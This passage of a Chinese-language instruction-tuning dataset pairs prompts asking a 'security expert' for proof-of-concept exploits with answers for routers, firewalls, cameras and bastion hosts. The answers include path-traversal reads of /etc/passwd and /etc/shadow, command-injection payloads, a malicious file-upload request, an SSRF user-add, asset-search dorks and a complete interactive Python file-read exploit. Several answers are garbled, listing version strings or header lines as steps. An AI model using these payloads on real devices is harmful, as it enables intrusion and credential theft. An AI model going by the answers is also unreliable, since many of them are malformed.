0.13.01r             | | Telus               | WiFi Hub (PRV65B444A-S-TS)         | v3.00.20             | | Telus               | NH20A                              | 1.00.10debug build06 | | Verizon             | Fios G3100                         | 2.0.0.6              | | Vodafone            | EasyBox 904                        | 4.16                 | | Vodafone            | EasyBox 903                        | 30.05.714            | | Vodafone            | EasyBox 802                        | 20.02.226            |\n网络测绘:``` app=\"Arcadyan-httpd-1.0\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-20090\n【POC利用方法】\n1. app=\"Arcadyan-httpd-1.0\"\n2. /images/..%2finfo.html\n3. app=\"Arcadyan-httpd-1.0\"\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Arcadyan固件 image 路径遍历漏洞 CVE-2021-20090.md"}
    433. 

  433. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:D-Link DSL-28881A 信息泄露 CVE-2020-24577\n漏洞描述:通过物理连接或无线访问建立与网络的连接后,恶意用户可以通过直接浏览以下URL来获取纯文本格式的Internet提供商连接用户名和密码,以及无线路由器的纯文本格式的用户名和密码\n影响版本:``` D-Link DSL-2888A ```\n网络测绘:``` body=\"DSL-2888A\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2020-24577\n【POC利用方法】\n1. D-Link DSL-2888A\n2. body=\"DSL-2888A\"\n3. 跳转到 http://xxx.xxx.xxx.xxx/page/login/login.html?error=fail 显示密码错误\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/D-Link DSL-28881A 信息泄露 CVE-2020-24577.md"}
    434. 

  434. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:中科网威 NPFW防火墙 CommandsPolling.php 任意文件读取漏洞\n漏洞描述:中科网威 NPFW防火墙 存在任意文件读取漏洞,由于代码过滤不足,可读取服务器任意文件\n影响版本:``` 中科网威 NPFW防火墙 ```\n网络测绘:``` \"中科网威\" && \"/direct\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 中科网威 NPFW防火墙\n2. \"中科网威\" && \"/direct\"\n3. POST /direct/polling/CommandsPolling.php HTTP/1.1\nHost: \nCookie: PHPSESSID=014d2705856e1df139772db42ccbaf9f\nContent-Length: 47\nCache-Control: max-age=0\nSec-Ch-Ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"\nSec-Ch-Ua-Mobile: ?0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\ncommand=ping&filename=%2Fetc%2Fpasswd&cmdParam=\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/中科网威 NPFW防火墙 CommandsPolling.php 任意文件读取漏洞.md"}
    435. 

  435. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Zyxel NBG2105 身份验证绕过 CVE-2021-3297\n漏洞描述:Zyxel NBG2105 存在身份验证绕过,攻击者通过更改 login参数可用实现后台登陆\n影响版本:``` Zyxel NBG2105 ```\n网络测绘:``` app=\"ZyXEL-NBG2105\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-3297\n【POC利用方法】\n1. Zyxel NBG2105\n2. app=\"ZyXEL-NBG2105\"\n3. function setCookie() //login_ok.htm use\n{\n\tdocument.cookie=\"login=1\";\n\tMM_goToURL('parent', 'home.htm');\n}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Zyxel NBG2105 身份验证绕过 CVE-2021-3297.md"}
    436. 

  436. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:腾达路由器 AC11 堆栈缓冲区溢出 CVE-2021-31758\n漏洞描述:在固件为02.03.01.104_CN的Tenda AC11设备上发现了一个问题。/goform/setportList 中的堆栈缓冲区溢出漏洞使攻击者可以通过精心设计的post请求在系统上执行任意代码。 参考链接: - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_2\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-31758\n【POC利用方法】\n1. POST /goform/setportList HTTP/1.1\nHost: 192.168.0.1\nContent-Length: 717\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36\nContent-Type: application/x-www-form-urlencoded;\nAccept: */*\nOrigin: http://192.168.0.1\nReferer: http://192.168.0.1/index.html\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nmodule1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&portList=1234aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n2. Host: 192.168.0.1\n3. Origin: http://192.168.0.1\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/腾达 路由器 AC11 堆栈缓冲区溢出 CVE-2021-31758.md"}
    437. 

  437. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:小米 路由器 extdisks 任意文件读取漏洞 CVE-2019-18371\n漏洞描述:小米 路由器存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器敏感信息\n影响版本:``` 小米 路由器 ```\n网络测绘:``` app=\"小米路由器\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2019-18371\n【POC利用方法】\n1. app=\"小米路由器\"\n2. /api-third-party/download/extdisks../etc/shadow\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/小米 路由器 extdisks 任意文件读取漏洞 CVE-2019-18371.md"}
    438. 

  438. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:华夏创新 LotWan广域网优化系统 check_instance_state.php 远程命令执行漏洞\n漏洞描述:华夏创新 LotWan广域网优化系统check_instance_state.php文件参数 ins存在命令拼接,导致远程命令执行漏洞\n影响版本:``` 华夏创新 LotWan广域网优化系统 ```\n网络测绘:``` title=\"LotWan 广域网优化系统\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 华夏创新 LotWan广域网优化系统\n2. title=\"LotWan 广域网优化系统\"\n3. /acc/check_instance_state.php?ins=;id>cmd.txt\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/华夏创新 LotWan广域网优化系统 check_instance_state.php 远程命令执行漏洞.md"}
    439. 

  439. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:D-Link DIR-846 命令注入漏洞 CVE-2020-27600\n漏洞描述:D-Link DIR-846 A1_100.26 路由器中的HNAP1/control/SetMasterWLanSettings.php允许远程攻击者通过ssid0或ssid1参数进行执行任意命令。 参考链接: - https://nvd.nist.gov/vuln/detail/CVE-2020-27600 - https://github.com/pwnninja/dlink/blob/main/DIR-846_SetMasterWLanSettingsCI.md\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2020-27600\n【POC利用方法】\n1. POST  /HNAPI HTTP/1.1\n...\n$data[\"ssid0\"]=\"'x;telnetd;'\"\n2. - https://nvd.nist.gov/vuln/detail/CVE-2020-27600\n3. $data[\"ssid0\"]=\"'x;telnetd;'\"\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/D-Link DIR-846 命令注入漏洞 CVE-2020-27600.md"}
    440. 

  440. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MSA 互联网管理网关 msa 任意文件下载漏洞\n漏洞描述:MSA 互联网管理网关存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件\n影响版本:``` MSA 互联网管理网关 ```\n网络测绘:``` \"互联网管理网关\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. MSA 互联网管理网关\n2. /msa/../../../../etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/MSA 互联网管理网关 msa 任意文件下载漏洞.md"}
    441. 

  441. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:宏电 H8922 后台任意文件读取漏洞 CVE-2021-28152\n漏洞描述:宏电 H8922 后台存在任意文件读取漏洞,低权限用户通过漏洞可以获取任意文件内容\n影响版本:``` 宏电 H8922 ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-28152\n【POC利用方法】\n1. app:\"Hongdian H8922 Industrial Router\"\n2. import requests\nimport sys\nimport random\nimport re\nfrom lxml import etree\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mGithub : https://github.com/PeiQi0                                 \\033[0m')\n    print('+  \\033[34m公众号  : PeiQi文库                                                   \\033[0m')\n    print('+  \\033[34mTitle  : 宏电 H8922 后台任意文件读取漏洞 CVE-2021-28152                 \\033[0m')\n    print('+  \\033[36m使用格式:  python3 poc.py                                            \\033[0m')\n    print('+  \\033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url, filename):\n    vuln_url = target_url + \"/log_download.cgi?type=../..{}\".format(filename)\n    headers = {\n            \"Content-Type\": \"application/x-www-form-urlencoded\",\n            \"Authorization\": \"Basic Z3Vlc3Q6Z3Vlc3Q=\"\n    }\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)\n        print(\"\\033[32m[o] 正在请求 {}/log_download.cgi?type=../../etc/passwd \\033[0m\".format(target_url))\n        if \"root\" in response.text and response.status_code == 200:\n            print(\"\\033[32m[o] 目标 {}存在漏洞 ,存在访客账号 guest/guest 成功读取 /etc/passwd \\033[0m\".format(target_url))\n            print(\"\\033[32m[o] 响应为:\\n{} \\033[0m\".format(response.text))\n            while True:\n                filename = input(\"\\033[35mFilename >>> \\033[0m\")\n                if filename == \"exit\":\n                    sys.exit(0)\n                else:\n                    POC_2(target_url, filename)\n        else:\n            print(\"\\033[31m[x] 请求失败 \\033[0m\")\n            sys.exit(0)\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\ndef POC_2(target_url, filename):\n    vuln_url = target_url + \"/log_download.cgi?type=../..{}\".format(filename)\n    headers = {\n        \"Content-Type\": \"application/x-www-form-urlencoded\",\n        \"Authorization\": \"Basic Z3Vlc3Q6Z3Vlc3Q=\"\n    }\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)\n        print(\"\\033[32m[o] {} \\033[0m\".format(response.text))\n\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\n\nif __name__ == '__main__':\n    title()\n    filename = '/etc/passwd'\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >>> \\033[0m\"))\n    POC_1(target_url, filename)\n3. vuln_url = target_url + \"/log_download.cgi?type=../..{}\".format(filename)\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/宏电 H8922 后台任意文件读取漏洞 CVE-2021-28152.md"}
    442. 

  442. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Milesight VPN server.js 任意文件读取漏洞\n漏洞描述:MilesightVPN 是一款软件,可使 Milesight 产品的 VPN 通道设置过程更加简便,并可通过网络服务器界面监控连接状态。其中存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件\n影响版本:Milesight VPN\n网络测绘:``` \"MilesightVPN\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. \"MilesightVPN\"\n2. GET /../etc/passwd HTTP/1.1\nHost: \nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n3. Accept: */*\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Milesight VPN server.js 任意文件读取漏洞.md"}
    443. 

  443. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞\n漏洞描述:H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令\n影响版本:``` H3C SecParh堡垒机 ```\n网络测绘:``` app=\"H3C-SecPath-运维审计系统\" && body=\"2018\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. H3C SecParh堡垒机\n2. app=\"H3C-SecPath-运维审计系统\" && body=\"2018\"\n3. /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞.md"}
    444. 

  444. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Kyan 网络监控设备 time.php 远程命令执行漏洞\n漏洞描述:Kyan 网络监控设备 time.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,可以获取服务器权限,存在远程命令执行漏洞\n影响版本:``` Kyan ```\n网络测绘:``` app=\"Kyan设计\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"Kyan设计\"\n2. <?php\nrequire_once 'functions.php';\nrequire_once 'international.php';\n\nsession_start();\nauth_check();\n\n//showHeader('Route', array('table.css'));\nif($_SERVER['REQUEST_METHOD'] == 'POST')\n{\n\tif(!user_is_admin())\n\t{\n\t\tshowErrMessage(\"permission denied\");\n\t\texit;\n\t}\n\t$timesynctype = $_POST[\"timesynctype\"];\n\tif($timesynctype!=\"client\")\n\t{\n\t\t$output = shell_exec(\"/bin/bashsuid -p -c \\\"/usr/sbin/ntpdate \" .$timesynctype. \"\\\"\");\n\t\tshowMessage($output);\t\t\n\t\tshell_exec(\"/bin/bashsuid -p -c \\\"hwclock --systohc\\\"\");\n\t}else\n\t{\n\t\t$ctime = $_POST[\"ctime\"];\n\t\tshell_exec(\"/bin/bashsuid -p -c \\\"date \" .$ctime. \"\\\"\");\n\t\tshell_exec(\"/bin/bashsuid -p -c \\\"hwclock --systohc\\\"\");\n\t}\n}\n        echo \"<html xmlns=\\\"http://www.w3.org/1999/xhtml\\\">\\n\";\n        echo \"  <head>\\n\";\n        echo \"    <meta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=UTF-8\\\" />\\n\";\n        echo \"    <meta http-equiv=\\\"Content-Style-Type\\\" content=\\\"text/css\\\" />\\n\";\n        echo \"    <meta http-equiv=\\\"Content-Script-Type\\\" content=\\\"text/javascript\\\" />\\n\";\n        echo \"    <link type=\\\"text/css\\\" rel=\\\"stylesheet\\\" href=\\\"./templates/clean.css\\\" title=\\\"PSI_Template\\\"/>\\n\";\n        echo \"    <title>time</title>\\n\";\n\techo \"<style type=\\\"text/css\\\">\";\n\techo \"th, td, h3 {\";\n\techo \"font-size: 12px;\";\n\techo \"}\";\n\techo \"</style>\";\n        echo \"  </head>\\n\";\t\n\n//print_html_begin(\"time\");\n?>\n<script language=\"javascript\" type=\"text/javascript\">\n//因程序执行耗费时间,所以时间并不十分准确,误差大约在2000毫秒以下\nvar xmlHttp = false;\n//获取服务器时间\ntry {\n  xmlHttp = new ActiveXObject(\"Msxml2.XMLHTTP\");\n} catch (e) {\n  try {\n    xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");\n  } catch (e2) {\n    xmlHttp = false;\n  }\n}\n\nif (!xmlHttp && typeof XMLHttpRequest != 'undefined') {\n  xmlHttp = new XMLHttpRequest();\n}\n\nxmlHttp.open(\"GET\", \"null.txt\", false);\nxmlHttp.setRequestHeader(\"Range\", \"bytes=-1\");\nxmlHttp.send(null);\n\nsevertime=new Date(xmlHttp.getResponseHeader(\"Date\"));\n\n//获取服务器日期\nvar year=severtime.getFullYear();\nvar month=severtime.getMonth()+1;\nvar date=severtime.getDate();\n//获取服务器时间\nvar hour=severtime.getHours();\nvar minu=severtime.getMinutes();\nvar seco=severtime.getSeconds();\n//获取客户端时间\nlocaltime=new Date();\n//取得时间差\nvar jtime=Math.abs(localtime.getTime()-severtime.getTime());\nvar jdate=jtime/(24*60*60*1000);\nvar jhour=jtime%(24*60*60*1000)/(60*60*1000);\nvar jminu=jtime%(24*60*60*1000)%(60*60*1000)/(60*1000);\nvar jsecond=jtime%(24*60*60*1000)%(60*60*1000)%(60*1000)/1000;\n\n//格式化输出客户端时间\nfunction getClientTime(){\nlocaltime=new Date();\nvar cyear=localtime.getFullYear();\nvar cmonth=localtime.getMonth()+1;\nvar cdate=localtime.getDate();\nvar chour=localtime.getHours();\nvar cminu=localtime.getMinutes();\nvar cseco=localtime.getSeconds();\n\nccyear=addZero(cyear);\nccmonth=addZero(cmonth);\nccdate=addZero(cdate);\ncchour=addZero(chour);\nccminu=addZero(cminu);\nccseco=addZero(cseco);\n\n document.getElementById(\"clienttime\").innerHTML=ccyear+\"-\"+ccmonth+\"-\"+ccdate+\" \"+cchour+\":\"+ccminu+\":\"+ccseco;\n document.getElementById(\"ctime\").value= ccmonth+\"\"+ccdate+\"\"+cchour+\"\"+ccminu+\"\"+ccyear+\".\"+ccseco;\n}\n//格式化输出服务器时间\nfunction getSeverTime(){\n  seco++;\n if(seco==60){\n  minu+=1;\n  seco=0;\n  }\n if(minu==60){\n   hour+=1;\n   minu=0;\n }\n if(hour==24){ \n  date+=1;\n  hour=0;\n }\n//日期处理\nif(month==1||month==3||month==5||month==7\n||month==8||month==10||month==12)\n {\n  if(date==32)\n  {\n   date=1;\n   month+=1;\n   }\n }else if(month==4||month==6||month==9||month==11){\n  if(date==31){\n   date=1;\n   month+=1;\n   }\n }else if(month==2){\n   if(year%4==0&&year%100!=0){//闰年处理\n    if(date==29){\n     date=1;\n     month+=1;\n    }\n   }else{\n    if(date==28){\n     date=1;\n     month+=1;\n    }\n   }\n }\n if(month==13){\n year+=1;\n month=1;\n }\n sseco=addZero(seco);\n sminu=addZero(minu);\n shour=addZero(hour);\n sdate=addZero(date);\n smonth=addZero(month);\n syear=year;\n \n document.getElementById(\"servertime\").innerHTML=syear+\"-\"+smonth+\"-\"+sdate+\" \"+shour+\":\"+sminu+\":\"+sseco;\n setTimeout(\"getSeverTime()\",1000);\n setTimeout(\"getClientTime()\",100);\n}\n\nfunction addZero(num) {\nnum=Math.floor(num);\nreturn ((num <= 9) ? (\"0\" + num) : num);\n}\nfunction updatetime()\n{\n\treturn true;\n}\n</script>\n\n<body onLoad=\"getSeverTime();\">\n<table style='width:500px' border='0' align='center' cellpadding='3' cellspacing='1'>\n<th colspan=\"2\"><?php echo lang_get('Timer'); ?></th>\n<tr ><td align='right' width=50%><?php echo lang_get('System time')?></td><td align='left'><div id=\"servertime\"></div></td></tr>\n<tr ><td align='right'><?php echo lang_get('Client time')?></td><td align='left'><div id=\"clienttime\"></div></td></tr>\n<tr ><td colspan=\"2\" align=\"center\">\n<form name=\"Form1\" method=\"post\" action=<?php echo $_SERVER['PHP_SELF']?>>\n<input type=\"hidden\" name=\"cdate\" id=\"cdate\" value=\"\"/>\n<input type=\"hidden\" name=\"ctime\" id=\"ctime\" value=\"\"/>\n<?php echo lang_get('Sync Source');?>:\n<select name=\"timesynctype\" id=\"timesynctype\" >\n<option value=\"time.windows.com\" selected=\"selected\">time.windows.com</option>\n<option value=\"time.nist.gov\">time.nist.gov</option>\n<?php \n/*$system_lic_file = '/mnt/licenses/system/system.dat';\n$bsynctoclient=false;\nif(file_exists($system_lic_file))\n{\n\t$output = shell_exec(\"/bin/bashsuid -p -c \\\"openssl bf-cbc -K 000102030405060708090A0B0C0D0E0F -iv 0102030405060708 -d -in /mnt/licenses/system/system.dat |grep -v \\\"^;\\\"|grep Expire\\\"\");\n\tif($output == \"\")\n\t{\n\t\t$bsynctoclient = true;\n\t}else\n\t{\n\t\t$bsynctoclient = false;\n\t}\n\t\n}\nif($bsynctoclient)\n{*/\n\techo \"<option value=\\\"client\\\" >\".lang_get('PC Client').\"</option>\";\n/* } */\n\n?>\n\n</select>\n<input  type=\"submit\" name=\"update\" id=\"update\" value=\"<?php echo lang_get('Update Now');?>\" />\n</form>\n</td></tr>\n</table>\n</body>\n</html>\n<?php\n//print_html_end();\n?>\n3. if($_SERVER['REQUEST_METHOD'] == 'POST')\n{\n\tif(!user_is_admin())\n\t{\n\t\tshowErrMessage(\"permission denied\");\n\t\texit;\n\t}\n\t$timesynctype = $_POST[\"timesynctype\"];\n\tif($timesynctype!=\"client\")\n\t{\n\t\t$output = shell_exec(\"/bin/bashsuid -p -c \\\"/usr/sbin/ntpdate \" .$timesynctype. \"\\\"\");\n\t\tshowMessage($output);\t\t\n\t\tshell_exec(\"/bin/bashsuid -p -c \\\"hwclock --systohc\\\"\");\n\t}else\n\t{\n\t\t$ctime = $_POST[\"ctime\"];\n\t\tshell_exec(\"/bin/bashsuid -p -c \\\"date \" .$ctime. \"\\\"\");\n\t\tshell_exec(\"/bin/bashsuid -p -c \\\"hwclock --systohc\\\"\");\n\t}\n}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Kyan 网络监控设备 time.php 远程命令执行漏洞.md"}
    445. 

  445. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Selea OCR-ANPR摄像机 get_file.php 任意文件读取漏洞\n漏洞描述:Selea OCR-ANPR摄像机 get_file.php存在 任意文件读取漏洞,通过构造特殊请求获取服务器文件\n影响版本:``` Selea Selea Targa IP OCR-ANPR Camera iZero Selea Selea Targa IP OCR-ANPR Camera Targa 512 Selea Selea Targa IP OCR-ANPR Camera Targa 504 Selea Selea Targa IP OCR-ANPR Camera Targa Semplice Selea Selea Targa IP OCR-ANPR Camera Targa 704 TKM Selea Selea Targa IP OCR-ANPR Camera Targa 805 Selea Selea Targa IP OCR-ANPR Camera Targa 710 INOX Selea Selea Targa IP OCR-ANPR Camera Targa 750 Selea Selea Targa IP OCR-ANPR Camera Targa 704 ILB ```\n网络测绘:``` \"selea_httpd\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. Selea Selea Targa IP OCR-ANPR Camera iZero\nSelea Selea Targa IP OCR-ANPR Camera Targa 512\nSelea Selea Targa IP OCR-ANPR Camera Targa 504\nSelea Selea Targa IP OCR-ANPR Camera Targa Semplice\nSelea Selea Targa IP OCR-ANPR Camera Targa 704 TKM\nSelea Selea Targa IP OCR-ANPR Camera Targa 805\nSelea Selea Targa IP OCR-ANPR Camera Targa 710 INOX\nSelea Selea Targa IP OCR-ANPR Camera Targa 750\nSelea Selea Targa IP OCR-ANPR Camera Targa 704 ILB\n2. \"selea_httpd\"\n3. POST /cgi-bin/get_file.php HTTP/1.1\nHost: \nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: lang=en; PHPSESSID=bvib0lq6lahlhbjnfv91k13ou0\n\nname=test&files_list=/etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Selea OCR-ANPR摄像机 get_file.php 任意文件读取漏洞.md"}
    446. 

  446. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:HIKVISION 综合安防管理平台 files 任意文件上传漏洞\n漏洞描述:HiKVISION 综合安防管理平台 files 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件\n影响版本:HiKVISION 综合安防管理平台\n网络测绘:``` app=\"HIKVISION-综合安防管理平台\" ``` ``` web.title==\"综合安防管理平台\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"HIKVISION-综合安防管理平台\"\n2. web.title==\"综合安防管理平台\"\n3. POST /center/api/files;.html HTTP/1.1\nHost: \nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a\n\n------WebKitFormBoundary9PggsiM755PLa54a\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp\"\nContent-Type: application/zip\n\n<%out.print(\"test3\");%>\n\n------WebKitFormBoundary9PggsiM755PLa54a--\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/HIKVISION 综合安防管理平台 files 任意文件上传漏洞.md"}
    447. 

  447. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:安恒 明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞\n漏洞描述:安恒 明御运维审计与风险控制系统 xmlrpc.sock 接口存在SSRF漏洞,通过漏洞可以添加任意用户控制堡垒机\n影响版本:安恒 明御运维审计与风险控制系统\n网络测绘:``` \"明御运维审计与风险控制系统\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. \"明御运维审计与风险控制系统\"\n2. POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1\nHost: \nCookie: LANG=zh; DBAPPUSM=ee4bbf6c85e541bb980ad4e0fbee2f57bb15bafe20a7028af9a0b8901cf80fd3\nContent-Length: 1117\nCache-Control: max-age=0\nSec-Ch-Ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"100\", \"Google Chrome\";v=\"100\"\nSec-Ch-Ua-Mobile: ?0\nSec-Ch-Ua-Platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\n<?xml version=\"1.0\"?>  